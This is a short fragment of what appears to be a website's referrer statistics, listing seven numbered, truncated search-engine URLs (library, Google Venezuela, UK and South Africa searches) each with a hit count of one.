2519http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2520http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2521http://www.google.com/custom?q=gene+owens+bucking+bulls&hl=en&client=pub-2456...1
2522http://www.google.co.ve/search?hl=es&q=studebaker+de+luis+herrera+campin&meta...1
2523http://www.google.co.ve/search?sourceid=navclient&aq=t&hl=es&ie=UTF-8&rlz=1T4...1
2524http://www.google.co.uk/search?um=1&hl=en&q=the+++new+monkey+++++,tricks++++r...1
2525http://www.google.co.za/search?hl=af&q=golden+gate+brdge+dimensions&meta=1